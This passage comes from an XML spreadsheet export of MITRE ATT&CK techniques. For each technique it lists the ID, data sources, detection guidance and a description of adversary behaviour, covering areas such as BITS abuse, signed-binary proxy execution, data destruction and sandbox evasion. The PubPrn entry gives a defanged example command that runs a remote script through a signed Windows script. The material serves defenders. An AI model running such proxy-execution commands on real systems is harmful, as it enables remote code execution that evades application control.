Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. </t>
  </si>
  <si>
    <t>T1195.002</t>
  </si>
  <si>
    <t>Compromise Software Supply Chain</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</si>
  <si>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 (Citation: Command Five SK 2011)  </t>
  </si>
  <si>
    <t>T1195.003</t>
  </si>
  <si>
    <t>Compromise Hardware Supply Chain</t>
  </si>
  <si>
    <t>Component firmware,BIOS,Disk forensics,EFI</t>
  </si>
  <si>
    <t>Perform physical inspection of hardware to look for potential tampering. Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes.</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</si>
  <si>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</si>
  <si>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BITS Jobs</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,Packet capture,Windows event logs</t>
  </si>
  <si>
    <t>BITS runs as a service and its status can be checked with the Sc query utility (&lt;code&gt;sc query bits&lt;/code&gt;). (Citation: Microsoft Issues with BITS July 2011) Active BITS tasks can be enumerated using the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (&lt;code&gt;bitsadmin /list /allusers /verbose&lt;/code&gt;). (Citation: Microsoft BITS)
Monitor usage of the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (especially the ‘Transfer’, 'Create', 'AddFile', 'SetNotifyFlags', 'SetNotifyCmdLine', 'SetMinRetryDelay', 'SetCustomHeaders', and 'Resume' command options)  (Citation: Microsoft BITS)Admin and the Windows Event log for BITS activity. Also consider investigating more detailed information about jobs by parsing the BITS job database. (Citation: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 (Citation: Microsoft BITS)</t>
  </si>
  <si>
    <t>Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM). (Citation: Microsoft COM) (Citation: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(Citation: Microsoft BITS) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool. (Citation: Microsoft BITSAdmin)
Adversaries may abuse BITS to download, execute, and even clean up after running malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls. (Citation: CTU BITS Malware June 2016) (Citation: Mondok Windows PiggyBack BITS May 2007) (Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots). (Citation: PaloAlto UBoatRAT Nov 2017) (Citation: CTU BITS Malware June 2016)
BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). (Citation: CTU BITS Malware June 2016)</t>
  </si>
  <si>
    <t>Firewall,Host forensic analysis</t>
  </si>
  <si>
    <t>Trusted Relationship</t>
  </si>
  <si>
    <t>Azure activity logs,Stackdriver logs,AWS CloudTrail logs,Application logs,Authentication logs,Third-party application logs</t>
  </si>
  <si>
    <t>Linux,Windows,macOS,AWS,GCP,Azure,SaaS</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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>Hardware Additions</t>
  </si>
  <si>
    <t>Asset management,Data loss prevention</t>
  </si>
  <si>
    <t>Asset management systems may help with the detection of computer systems or network devices that should not exist on a network. 
Endpoint sensors may be able to detect the addition of hardware via USB, Thunderbolt, and other external device communication ports.</t>
  </si>
  <si>
    <t>Adversaries may introduce computer accessories, computers, or networking hardware into a system or network that can be used as a vector to gain access. While public references of usage by APT groups are scarce, many penetration testers leverage hardware additions for initial access. Commercial and open source products are leveraged with capabilities such as passive network tapping (Citation: Ossmann Star Feb 2011), man-in-the middle encryption breaking (Citation: Aleks Weapons Nov 2015), keystroke injection (Citation: Hak5 RubberDuck Dec 2016), kernel memory reading via DMA (Citation: Frisk DMA August 2016), adding new wireless access to an existing network (Citation: McMillan Pwn March 2012), and others.</t>
  </si>
  <si>
    <t>Password Policy Discovery</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</si>
  <si>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</si>
  <si>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Adversaries may attempt to access detailed information about the password policy used within an enterprise network. Password policies for networks are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110).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getaccountpolicies&lt;/code&gt;.(Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies)</t>
  </si>
  <si>
    <t>Indirect Command Execution</t>
  </si>
  <si>
    <t>Monitor and analyze logs from host-based detection mechanisms, such as Sysmon, for events such as process creations that include or are resulting from parameters associated with invoking programs/commands/files and/or spawning child processes/network connections. (Citation: RSA Forfiles Aug 2017)</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</si>
  <si>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</si>
  <si>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Static File Analysis,Application control,Application control by file name or path</t>
  </si>
  <si>
    <t>Exploitation for Client Execution</t>
  </si>
  <si>
    <t>Anti-virus,System calls,Process monitoring</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</si>
  <si>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</si>
  <si>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</si>
  <si>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User Execution</t>
  </si>
  <si>
    <t>Anti-virus,Process command-line parameters,Process monitoring</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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1204.001</t>
  </si>
  <si>
    <t>Malicious Link</t>
  </si>
  <si>
    <t>Anti-virus,Process monitoring,Web proxy</t>
  </si>
  <si>
    <t>Inspect network traffic for indications that a user visited a malicious site, such as links included in phishing campaigns directed at your organization.
Anti-virus can potentially detect malicious documents and files that are downloaded from a link and executed on the user's computer.</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</si>
  <si>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</si>
  <si>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T1204.002</t>
  </si>
  <si>
    <t>Malicious File</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</si>
  <si>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</si>
  <si>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on the file to increase the likelihood that a user will open it.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</si>
  <si>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Traffic Signaling</t>
  </si>
  <si>
    <t>Packet capture,Netflow/Enclave netflow</t>
  </si>
  <si>
    <t>Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows.</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</si>
  <si>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capabilities.(Citation: Cisco Synful Knock Evolution) (Citation: FireEye - Synful Knock) (Citation: Cisco Blog Legacy Device Attacks)  To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture.</t>
  </si>
  <si>
    <t>defense-evasion,persistence,command-and-control</t>
  </si>
  <si>
    <t>Defensive network service scanning</t>
  </si>
  <si>
    <t>T1205.001</t>
  </si>
  <si>
    <t>Port Knocking</t>
  </si>
  <si>
    <t>Netflow/Enclave netflow,Packet capture</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</si>
  <si>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</si>
  <si>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Rogue Domain Controller</t>
  </si>
  <si>
    <t>API monitoring,Authentication logs,Network protocol analysis,Packet capture</t>
  </si>
  <si>
    <t>Monitor and analyze network traffic associated with data replication (such as calls to DrsAddEntry, DrsReplicaAdd, and especially GetNCChanges) between DCs as well as to/from non DC hosts. (Citation: GitHub DCSYNCMonitor) (Citation: DCShadow Blog) DC replication will naturally take place every 15 minutes but can be triggered by an attacker or by legitimate urgent changes (ex: passwords).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DCShadow Blog)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</si>
  <si>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Injection](https://attack.mitre.org/techniques/T1178) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. (Citation: DCShadow Blog)</t>
  </si>
  <si>
    <t>Exploitation of Remote Services</t>
  </si>
  <si>
    <t>Windows Error Reporting,Process monitoring,File monitoring</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</si>
  <si>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</si>
  <si>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 (Citation: NVD CVE-2014-7169)
Depending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well.</t>
  </si>
  <si>
    <t>Exploitation for Defense Evasion</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</si>
  <si>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</si>
  <si>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Adversaries may exploit a system or application vulnerability to bypass security features. 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t>
  </si>
  <si>
    <t>Anti-virus,System access controls</t>
  </si>
  <si>
    <t>Exploitation for Credential Access</t>
  </si>
  <si>
    <t>Authentication logs,Windows Error Reporting,Process monitoring</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</si>
  <si>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</si>
  <si>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permissions.(Citation: Technet MS14-068)(Citation: ADSecurity Detecting Forged Tickets) Exploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained.</t>
  </si>
  <si>
    <t>Data from Information Repositories</t>
  </si>
  <si>
    <t>OAuth audit logs,Application logs,Authentication logs,Data loss prevention,Third-party application logs</t>
  </si>
  <si>
    <t>Linux,Windows,macOS,SaaS,Office 365</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</si>
  <si>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The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</si>
  <si>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[Sharepoint](https://attack.mitre.org/techniques/T1213/002), [Confluence](https://attack.mitre.org/techniques/T1213/001), and enterprise databases such as SQL Server.</t>
  </si>
  <si>
    <t>T1213.001</t>
  </si>
  <si>
    <t>Confluence</t>
  </si>
  <si>
    <t>Third-party application logs,Authentication logs</t>
  </si>
  <si>
    <t>SaaS</t>
  </si>
  <si>
    <t>Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators)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User access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.</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</si>
  <si>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</si>
  <si>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T1213.002</t>
  </si>
  <si>
    <t>Sharepoint</t>
  </si>
  <si>
    <t>Office 365 audit logs,Authentication logs,Application logs</t>
  </si>
  <si>
    <t xml:space="preserve">The user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging). 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</si>
  <si>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</si>
  <si>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Signed Script Proxy Execution</t>
  </si>
  <si>
    <t>Monitor script processes, such as `cscript`, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.</t>
  </si>
  <si>
    <t>Adversaries may use scripts signed with trusted certificates to proxy execution of malicious files. Several Microsoft signed scripts that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List)</t>
  </si>
  <si>
    <t>Application control,Digital Certificate Validation</t>
  </si>
  <si>
    <t>T1216.001</t>
  </si>
  <si>
    <t>PubPrn</t>
  </si>
  <si>
    <t>Adversaries may use the trusted PubPrn script to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application control solutions that do not account for use of these scripts.
&lt;code&gt;PubPrn.vbs&lt;/code&gt; is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and can be used to proxy execution from a remote site.(Citation: Enigma0x3 PubPrn Bypass) An example command is &lt;code&gt;cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Browser Bookmark Discovery</t>
  </si>
  <si>
    <t>API monitoring,File monitoring,Process command-line parameters,Process monitoring</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</si>
  <si>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[PowerShell](https://attack.mitre.org/techniques/T1059/001).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</si>
  <si>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bookmarks are typically stored in local files/databases.</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution</t>
  </si>
  <si>
    <t>API monitoring,File monitoring,Binary file metadata,Process use of network,Windows Registry,Loaded DLLs,DLL monitoring,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Monitor processes and command-line parameters for signed binaries that may be used to proxy execution of malicious files. Compare recent invocations of signed binaries that may be used to proxy execution with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Legitimate programs used in suspicious ways, like msiexec.exe downloading an MSI file from the Internet, may be indicative of an intrusion. Correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.
Monitor for file activity (creations, downloads, modifications, etc.), especially for file types that are not typical within an environment and may be indicative of adversary activity.</t>
  </si>
  <si>
    <t>Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed binaries. Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files.</t>
  </si>
  <si>
    <t>Anti-virus,Application control,Digital Certificate Validation</t>
  </si>
  <si>
    <t>T1218.001</t>
  </si>
  <si>
    <t>Compiled HTML File</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Digital Certificate Validation,Application control</t>
  </si>
  <si>
    <t>T1218.002</t>
  </si>
  <si>
    <t>Control Panel</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,Windows Registry,DLL monitoring,Binary file metadata,API monitoring</t>
  </si>
  <si>
    <t>Monitor and analyze activity related to items associated with CPL files, such as the control.exe and the &lt;code&gt;Control_RunDLL&lt;/code&gt; and &lt;code&gt;ControlRunDLLAsUser&lt;/code&gt; API functions in shell32.dll. When executed from the command line or clicked, control.exe will execute the CPL file (ex: &lt;code&gt;control.exe file.cpl&lt;/code&gt;) before [Rundll32](https://attack.mitre.org/techniques/T1218/011) is used to call the CPL's API functions (ex: &lt;code&gt;rundll32.exe shell32.dll,Control_RunDLL file.cpl&lt;/code&gt;). CPL files can be executed directly via the CPL API function with just the latter [Rundll32](https://attack.mitre.org/techniques/T1218/011) command, which may bypass detections and/or execution filters for control.exe.(Citation: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 or HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Control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techniques.(Citation: TrendMicro CPL Malware Jan 2014)</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</si>
  <si>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</si>
  <si>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T1218.003</t>
  </si>
  <si>
    <t>CMSTP</t>
  </si>
  <si>
    <t>Windows event logs,Process use of network,Process command-line parameters,Process monitoring</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</si>
  <si>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Control](https://attack.mitre.org/techniques/T1548/002)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</si>
  <si>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signed Microsoft application.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</si>
  <si>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T1218.004</t>
  </si>
  <si>
    <t>InstallUtil</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</si>
  <si>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</si>
  <si>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InstallUtil is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</si>
  <si>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T1218.005</t>
  </si>
  <si>
    <t>Mshta</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of mshta.exe. Look for mshta.exe executing raw or obfuscated script within the command-line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed .hta files to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the .hta file being executed.
Monitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious</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</si>
  <si>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</si>
  <si>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T1218.007</t>
  </si>
  <si>
    <t>Msiexec</t>
  </si>
  <si>
    <t>DLL monitoring,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of msiexec.exe. Compare recent invocations of msiexec.exe with prior history of known good arguments and executed MSI files or DLLs to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of msiexec.exe may also be useful in determining the origin and purpose of the MSI files or DLLs being executed.</t>
  </si>
  <si>
    <t>Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) Msiexec.exe is digitally signed by Microsoft.
Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it is signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse.</t>
  </si>
  <si>
    <t>T1218.008</t>
  </si>
  <si>
    <t>Odbcconf</t>
  </si>
  <si>
    <t>Loaded DLLs,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of odbcconf.exe. Compare recent invocations of odbcconf.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of odbcconf.exe may also be useful in determining the origin and purpose of the DLL being loaded.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) Odbcconf.exe is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</si>
  <si>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T1218.009</t>
  </si>
  <si>
    <t>Regsvcs/Regasm</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</si>
  <si>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</si>
  <si>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Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are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</si>
  <si>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T1218.010</t>
  </si>
  <si>
    <t>Regsvr32</t>
  </si>
  <si>
    <t>Windows Registry,Process command-line parameters,Process monitoring,Loaded DLLs</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</si>
  <si>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</si>
  <si>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Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.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attack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</si>
  <si>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Digital Certificate Validation,Anti-virus,Application control</t>
  </si>
  <si>
    <t>T1218.011</t>
  </si>
  <si>
    <t>Rundll32</t>
  </si>
  <si>
    <t>DLL monitoring,Loaded DLLs,Process command-line parameters,Process monitoring</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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>Digital Certificate Validation,Application control,Anti-virus</t>
  </si>
  <si>
    <t>T1218.012</t>
  </si>
  <si>
    <t>Verclsid</t>
  </si>
  <si>
    <t>Process use of network,Process command-line parameters,Process monitoring,File monitoring</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of verclsid.exe. Compare recent invocations of verclsid.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of verclsid.exe may also be useful in determining the origin and purpose of the payload being executed. Depending on the environment, it may be unusual for verclsid.exe to have a parent process of a Microsoft Office product. It may also be unusual for verclsid.exe to have any child processes or to make network connections or file modifications.</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</si>
  <si>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it is signed and native on Windows systems, proxying execution via verclsid.exe may bypass application control solutions that do not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation: Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation: Nick Tyrer GitHub) </t>
  </si>
  <si>
    <t>Remote Access Software</t>
  </si>
  <si>
    <t>Network intrusion detection system,Network protocol analysis,Process use of network,Process monitoring</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</si>
  <si>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Fronting](https://attack.mitre.org/techniques/T1090/004) may be used in conjunction to avoid defenses. Adversaries will likely need to deploy and/or install these remote tools to compromised systems. It may be possible to detect or prevent the installation of these tools with host-based solutions.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</si>
  <si>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allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
Remote access tools may be established and used post-compromise as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 (Citation: CrowdStrike 2015 Global Threat Report) (Citation: CrySyS Blog TeamSpy)</t>
  </si>
  <si>
    <t>XSL Script Processing</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,Process use of network,DLL monitoring</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</si>
  <si>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LOLBAS Wmic)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</si>
  <si>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[Regsvr32](https://attack.mitre.org/techniques/T1117)/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</si>
  <si>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Template Injection</t>
  </si>
  <si>
    <t>Anti-virus,Email gateway,Network intrusion detection system,Web logs</t>
  </si>
  <si>
    <t>Analyze process behavior to determine if an Office application is performing actions, such as opening network connections, reading files, spawning abnormal child processes (ex: [PowerShell](https://attack.mitre.org/techniques/T1059/001)), or other suspicious actions that could relate to post-compromise behavior.</t>
  </si>
  <si>
    <t>Adversaries may create or modify references in Office document templates to conceal malicious code or force authentication attempts.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(Citation: Microsoft Open XML July 2017)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Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded. (Citation: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 (Citation: Redxorblue Remote Template Injection) Examples have been seen in the wild where template injection was used to load malicious code containing an exploit. (Citation: MalwareBytes Template Injection OCT 2017)
This technique may also enable [Forced Authentication](https://attack.mitre.org/techniques/T1187) by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt. (Citation: Anomali Template Injection MAR 2018) (Citation: Talos Template Injection July 2017) (Citation: ryhanson phishery SEPT 2016)</t>
  </si>
  <si>
    <t>Static File Analysis</t>
  </si>
  <si>
    <t>File and Directory Permissions Modification</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</si>
  <si>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</si>
  <si>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[.bash_profile and .bashrc](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).</t>
  </si>
  <si>
    <t>T1222.001</t>
  </si>
  <si>
    <t>Windows File and Directory Permissions Modification</t>
  </si>
  <si>
    <t>Windows event logs,Process command-line parameters,Process monitoring,File monitoring</t>
  </si>
  <si>
    <t>Monitor and investigate attempts to modify DACLs and file/directory ownership. Many of the commands used to modify DACLs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</si>
  <si>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</si>
  <si>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T1222.002</t>
  </si>
  <si>
    <t>Linux and Mac File and Directory Permissions Modification</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</si>
  <si>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</si>
  <si>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[.bash_profile and .bashrc](https://attack.mitre.org/techniques/T1546/004) or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).</t>
  </si>
  <si>
    <t>Execution Guardrails</t>
  </si>
  <si>
    <t>Detecting the use of guardrails may be difficult depending on the implementation. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short period of time, may aid in detection.</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</si>
  <si>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</si>
  <si>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Anti-virus,Host forensic analysis,Signature-based detection,Static file analysis</t>
  </si>
  <si>
    <t>T1480.001</t>
  </si>
  <si>
    <t>Environmental Keying</t>
  </si>
  <si>
    <t>Detecting the use of environmental keying may be difficult depending on the implementation. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short period of time, may aid in detection.</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</si>
  <si>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</si>
  <si>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Domain Trust Discovery</t>
  </si>
  <si>
    <t>PowerShell logs,API monitoring,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t xml:space="preserve">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such as `nltest /domain_trusts`. Remote access tools with built-in features may interact directly with the Windows API to gather information. Look for the `DSEnumerateDomainTrusts()` Win32 API call to spot activity associated with [Domain Trust Discovery](https://attack.mitre.org/techniques/T1482).(Citation: Harmj0y Domain Trusts) Information may also be acquired through Windows system management tools such as [PowerShell](https://attack.mitre.org/techniques/T1059/001). The .NET method `GetAllTrustRelationships()` can be an indicator of [Domain Trust Discovery](https://attack.mitre.org/techniques/T1482).(Citation: Microsoft GetAllTrustRelationships)
</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</si>
  <si>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</si>
  <si>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Group Policy Modification</t>
  </si>
  <si>
    <t xml:space="preserve">It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
* Event ID 5136 - A directory service object was modified
* Event ID 5137 - A directory service object was created
* Event ID 5138 - A directory service object was undeleted
* Event ID 5139 - A directory service object was moved
* Event ID 5141 - A directory service object was deleted
GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704). </t>
  </si>
  <si>
    <t xml:space="preserve">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predicable network path &lt;code&gt;\\&amp;lt;DOMAIN&amp;gt;\SYSVOL\&amp;lt;DOMAIN&amp;gt;\Policies\&lt;/code&gt;.(Citation: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Execution](https://attack.mitre.org/techniques/T1035),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t>
  </si>
  <si>
    <t>System access controls,File system access controls</t>
  </si>
  <si>
    <t>Data Destruction</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and command-line parameters of binaries that could be involved in data destruction activity, such as [SDelete](https://attack.mitre.org/software/S0195). Monitor for the creation of suspicious files as well as high unusual file modification activity. In particular, look for large quantities of file modifications in user directories and under &lt;code&gt;C:\Windows\System32\&lt;/code&gt;.</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</si>
  <si>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t>
  </si>
  <si>
    <t>impact</t>
  </si>
  <si>
    <t>Data Encrypted for Impact</t>
  </si>
  <si>
    <t>Kernel drivers,File monitoring,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and command line parameters of binaries involved in data destruction activity, such as vssadmin, wbadmin, and bcdedit. Monitor for the creation of suspicious files as well as unusual file modification activity. In particular, look for large quantities of file modifications in user directories.
In some cases, monitoring for unusual kernel driver installation activity can aid in detection.</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</si>
  <si>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t>
  </si>
  <si>
    <t>Service Stop</t>
  </si>
  <si>
    <t>File monitoring,Process command-line parameters,Process monitoring,Windows Registry,API monitoring</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments to see if critical processes are terminated or stop running.
Monitor for edits for modifications to services and startup programs that correspond to services of high importance. Look for changes to services that do not correlate with known software, patch cycles, etc. Windows service information is stored in the Registry at &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services&lt;/code&gt;. Systemd service unit files are stored within the /etc/systemd/system, /usr/lib/systemd/system/, and /home/.config/systemd/user/ directories, as well as associated symbolic links.
Alterations to the service binary path or the service startup type changed to disabled may be suspicious.
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, &lt;code&gt;ChangeServiceConfigW&lt;/code&gt; may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018)</t>
  </si>
  <si>
    <t>Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services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may not allow for modification of their data stores while running. Adversaries may stop services in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)</t>
  </si>
  <si>
    <t>Inhibit System Recovery</t>
  </si>
  <si>
    <t>Windows Registry,Services,Windows event logs,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and command line parameters of binaries involved in inhibiting system recovery, such as vssadmin, wbadmin, and bcdedit. The Windows event logs, ex. Event ID 524 indicating a system catalog was deleted, may contain entries associated with suspicious activity.
Monitor the status of services involved in system recovery. Monitor the registry for changes associated with system recovery features (ex: the creation of &lt;code&gt;HKEY_CURRENT_USER\Software\Policies\Microsoft\PreviousVersions\DisableLocalPage&lt;/code&gt;).</t>
  </si>
  <si>
    <t>Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017)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t>
  </si>
  <si>
    <t>Defacement</t>
  </si>
  <si>
    <t>Packet capture,Web application firewall logs,Web logs,Packet capture</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor internal and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
</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may modify visual content available internally or externally to an enterprise network.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</si>
  <si>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T1491.001</t>
  </si>
  <si>
    <t>Internal Defacement</t>
  </si>
  <si>
    <t>Web logs,Web application firewall logs,Packet capture</t>
  </si>
  <si>
    <t>Monitor internal and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</si>
  <si>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An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users.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</si>
  <si>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T1491.002</t>
  </si>
  <si>
    <t>External Defacement</t>
  </si>
  <si>
    <t>Monitor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</si>
  <si>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An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users.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</si>
  <si>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Firmware Corruption</t>
  </si>
  <si>
    <t>BIOS,Component firmware</t>
  </si>
  <si>
    <t>System firmware manipulation may be detected.(Citation: MITRE Trustworthy Firmware Measurement) Log attempts to read/write to BIOS and compare against known patching behavior.</t>
  </si>
  <si>
    <t>Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices could include the motherboard, hard drive, or video cards.</t>
  </si>
  <si>
    <t>Resource Hijacking</t>
  </si>
  <si>
    <t>Azure activity logs,Stackdriver logs,AWS CloudTrail logs,Process use of network,Process monitoring,Network protocol analysis,Network device logs</t>
  </si>
  <si>
    <t>Consider monitoring process resource usage to determine anomalous activity associated with malicious hijacking of computer resources such as CPU, memory, and graphics processing resources. Monitor for suspicious use of network resources associated with cryptocurrency mining software. Monitor for common cryptomining software process names and files on local systems that may indicate compromise and resource usage.</t>
  </si>
  <si>
    <t>Adversaries may leverage the resources of co-opted systems in order to solve resource intensive problems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cloud-based(Citation: CloudSploit - Unused AWS Regions) systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining.</t>
  </si>
  <si>
    <t>Virtualization/Sandbox Evasion</t>
  </si>
  <si>
    <t>Virtualization, sandbox, user activity, and related discovery techniques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</si>
  <si>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 xml:space="preserve">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t>
  </si>
  <si>
    <t>defense-evasion,discovery</t>
  </si>
  <si>
    <t>Anti-virus,Host forensic analysis,Signature-based detection,Static File Analysis</t>
  </si>
  <si>
    <t>T1497.001</t>
  </si>
  <si>
    <t>System Checks</t>
  </si>
  <si>
    <t>Virtualization/sandbox related system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</si>
  <si>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Specific checks may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uptime and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size.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t>
  </si>
  <si>
    <t>Static File Analysis,Signature-based detection,Host forensic analysis,Anti-virus</t>
  </si>
  <si>
    <t>T1497.002</t>
  </si>
  <si>
    <t>User Activity Based Checks</t>
  </si>
  <si>
    <t>Process command-line parameters,Process use of network</t>
  </si>
  <si>
    <t xml:space="preserve">User activity-based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</si>
  <si>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 xml:space="preserve">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t>
  </si>
  <si>
    <t>Anti-virus,Static File Analysis,Signature-based detection,Host forensic analysis</t>
  </si>
  <si>
    <t>T1497.003</t>
  </si>
  <si>
    <t>Time Based Evasion</t>
  </si>
  <si>
    <t xml:space="preserve">Time-based evasion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</si>
  <si>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 xml:space="preserve">Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include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 </t>
  </si>
  <si>
    <t>Host forensic analysis,Signature-based detection,Static File Analysis,Anti-virus</t>
  </si>
  <si>
    <t>Network Denial of Service</t>
  </si>
  <si>
    <t>Sensor health and status,Network protocol analysis,Netflow/Enclave netflow,Network intrusion detection system,Network device logs</t>
  </si>
  <si>
    <t>Linux,macOS,Windows,AWS,GCP,Azure AD,SaaS,Azure,Office 365</t>
  </si>
  <si>
    <t>Detection of Network DoS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an Network DoS event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.</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</si>
  <si>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</si>
  <si>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T1498.001</t>
  </si>
  <si>
    <t>Direct Network Flood</t>
  </si>
  <si>
